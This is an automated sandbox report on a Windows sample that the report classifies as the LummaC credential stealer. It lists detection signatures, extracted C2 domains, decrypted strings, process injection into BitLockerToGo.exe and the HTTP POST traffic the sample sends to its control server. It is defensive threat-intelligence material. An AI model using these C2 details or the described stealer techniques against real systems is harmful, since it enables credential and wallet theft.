Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
github_softwares_v1.18.exe

Overview

General Information

Sample name:github_softwares_v1.18.exe
Analysis ID:1483201
MD5:444cf08b351822e4bec5c4c1b9324942
SHA1:d5607171f7aa06682efed7ced3ddaff08e2b384b
SHA256:17aad4db38649728ef0e666755351794d4de41d82a36608226d8656ea54233cb
Tags:exe
Infos:

Detection

LummaC, Go Injector, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Go Injector
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • github_softwares_v1.18.exe (PID: 6632 cmdline: "C:\Users\user\Desktop\github_softwares_v1.18.exe" MD5: 444CF08B351822E4BEC5C4C1B9324942)
    • BitLockerToGo.exe (PID: 7056 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["bravedreacisopm.shop", "shellfyyousdjz.shop", "broccoltisop.shop", "grassytaisol.shop", "stimultaionsppzv.shop", "parntorpkxzlp.shop", "effectivedoxzj.shop", "horizonvxjis.shop", "weaknessmznxo.shop"], "Build id": "LPnhqo--@kolnausgb"}
SourceRuleDescriptionAuthorStrings
github_softwares_v1.18.exeJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
    SourceRuleDescriptionAuthorStrings
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1708564024.000000C0006DC000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
      • 0x0:$x1: 4d5a9000030000000
      00000001.00000003.1777410523.0000000002E89000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000001.00000003.1777480522.0000000002E8B000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000000.1663970758.00007FF764F18000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
            00000000.00000002.1711084287.00007FF764F18000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_GoInjector_2Yara detected Go InjectorJoe Security
              Click to see the 5 entries
              No Sigma rule has matched
              No Snort rule has matched
              Timestamp:2024-07-26T20:34:17.067725+0200
              SID:2054653
              Source Port:49738
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-26T20:34:04.320473+0200
              SID:2054653
              Source Port:49731
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-26T20:34:42.629750+0200
              SID:2022930
              Source Port:443
              Destination Port:61397
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-26T20:34:06.971675+0200
              SID:2048094
              Source Port:49733
              Destination Port:443
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-26T20:34:08.122528+0200
              SID:2048094
              Source Port:49734
              Destination Port:443
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-07-26T20:34:41.323239+0200
              SID:2022930
              Source Port:443
              Destination Port:61396
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-26T20:34:19.147395+0200
              SID:2022930
              Source Port:443
              Destination Port:49739
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-07-26T20:34:05.636459+0200
              SID:2054653
              Source Port:49732
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: stimultaionsppzv.shopAvira URL Cloud: Label: malware
              Source: bravedreacisopm.shopAvira URL Cloud: Label: phishing
              Source: https://weaknessmznxo.shop/apiAvira URL Cloud: Label: malware
              Source: https://weaknessmznxo.shop:443/apiAvira URL Cloud: Label: malware
              Source: effectivedoxzj.shopAvira URL Cloud: Label: malware
              Source: 0.3.github_softwares_v1.18.exe.14a79900000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["bravedreacisopm.shop", "shellfyyousdjz.shop", "broccoltisop.shop", "grassytaisol.shop", "stimultaionsppzv.shop", "parntorpkxzlp.shop", "effectivedoxzj.shop", "horizonvxjis.shop", "weaknessmznxo.shop"], "Build id": "LPnhqo--@kolnausgb"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.3% probability
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: bravedreacisopm.shop
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: shellfyyousdjz.shop
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: broccoltisop.shop
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: grassytaisol.shop
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: stimultaionsppzv.shop
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: parntorpkxzlp.shop
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: effectivedoxzj.shop
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: horizonvxjis.shop
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: weaknessmznxo.shop
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1708564024.000000C000618000.00000004.00001000.00020000.00000000.sdmpString decryptor: LPnhqo--@kolnausgb
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 1_2_02A16E50 CryptUnprotectData,1_2_02A16E50
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.159.243:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: github_softwares_v1.18.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000580000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708247125.000000C000400000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701551736.0000014A798F0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701601425.0000014A798B0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C0006A1000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C000580000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708247125.000000C000400000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701551736.0000014A798F0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000003.1701601425.0000014A798B0000.00000004.00001000.00020000.00000000.sdmp, github_softwares_v1.18.exe, 00000000.00000002.1708564024.000000C0006A1000.00000004.00001000.00020000.00000000.sdmp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [eax], bl1_2_02A0F290
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]1_2_02A3C2D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]1_2_02A3A088
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_02A3C020
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esi+10h], 00000000h1_2_02A12846
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]1_2_02A12846
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esi+04h], eax1_2_02A27970
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+00000094h]1_2_02A27970
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al1_2_02A27970
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], 0000002Bh1_2_02A27970
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], dl1_2_02A27970
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esi+3Ch]1_2_02A27970
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov dword ptr [esi+08h], ebx1_2_02A29EF2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+6Ch]1_2_02A29EF2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edi], al1_2_02A29EF2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+20h]1_2_02A04E70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11081610h1_2_02A16E50
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]1_2_02A09FA0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 077DEFCDh1_2_02A3C7E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_02A37F70
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+60h]1_2_02A17CBB
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp]1_2_02A21D60
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+00000880h]1_2_02A21AAF
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 11081610h1_2_02A25AEA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 11081610h1_2_02A25A01
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [esi+eax], 0000h1_2_02A19212
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]1_2_02A18A72
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], B33E16A3h1_2_02A15BA8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp dword ptr [02A42DE4h]1_2_02A15BA8
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]1_2_02A26BB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 11081610h1_2_02A25B83
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp dword ptr [02A44B7Ch]1_2_02A25B83
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, ecx1_2_02A1F321
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx esi, word ptr [edi+ecx*4]1_2_02A08330
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx1_2_02A3B300
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edx, dword ptr [esp]1_2_02A09890
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov byte ptr [edx], bl1_2_02A09890
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx1_2_02A3B090
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movsx ecx, byte ptr [esi+eax]1_2_02A0E0E0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, eax1_2_02A120F0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esi+04h]1_2_02A2582B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]1_2_02A1E80E
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]1_2_02A229FA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx1_2_02A3B1D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 3BEBD150h1_2_02A3C1D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx1_2_02A3B920
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx1_2_02A23909
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h1_2_02A27140
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx1_2_02A3AE80
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov edi, ebx1_2_02A38EE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]1_2_02A03620
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx1_2_02A3B630
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h1_2_02A1DFB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [eax], cx1_2_02A15799
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then cmp byte ptr [ecx], 00000000h1_2_02A14F7A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]1_2_02A3C4B0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp]1_2_02A2143B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx ecx, byte ptr [ebx]1_2_02A03450
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]1_2_02A1BD90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]1_2_02A36590
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+18h]1_2_02A0FDE3
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov word ptr [esi], cx1_2_02A0FDE3
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then mov ecx, dword ptr [esp+60h]1_2_02A185D0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then dec edi1_2_02A3CDD0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then movzx eax, word ptr [edx]1_2_02A3AD00
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then jmp ecx1_2_02A3AD00
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4x nop then inc ebx1_2_02A16550

              Networking

              barindex
              Source: Malware configuration extractorURLs: bravedreacisopm.shop
              Source: Malware configuration extractorURLs: shellfyyousdjz.shop
              Source: Malware configuration extractorURLs: broccoltisop.shop
              Source: Malware configuration extractorURLs: grassytaisol.shop
              Source: Malware configuration extractorURLs: stimultaionsppzv.shop
              Source: Malware configuration extractorURLs: parntorpkxzlp.shop
              Source: Malware configuration extractorURLs: effectivedoxzj.shop
              Source: Malware configuration extractorURLs: horizonvxjis.shop
              Source: Malware configuration extractorURLs: weaknessmznxo.shop
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: weaknessmznxo.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: weaknessmznxo.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18168Host: weaknessmznxo.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8789Host: weaknessmznxo.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20442Host: weaknessmznxo.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1279Host: weaknessmznxo.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550577Host: weaknessmznxo.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: weaknessmznxo.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: weaknessmznxo.shop
              Source: global trafficDNS traffic detected: DNS query: 18.31.95.13.in-addr.arpa
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: weaknessmznxo.shop
              Source: github_softwares_v1.18.exeString found in binary or memory: http://.css
              Source: github_softwares_v1.18.exeString found in binary or memory: http://.jpg
              Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: github_softwares_v1.18.exeString found in binary or memory: http://html4/loose.dtd
              Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: BitLockerToGo.exe, 00000001.00000003.1755112502.0000000004FDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: BitLockerToGo.exe, 00000001.00000003.1756837470.0000000002F02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: BitLockerToGo.exe, 00000001.00000003.1731546584.0000000004FD1000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000001.00000003.1731597052.0000000002F38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
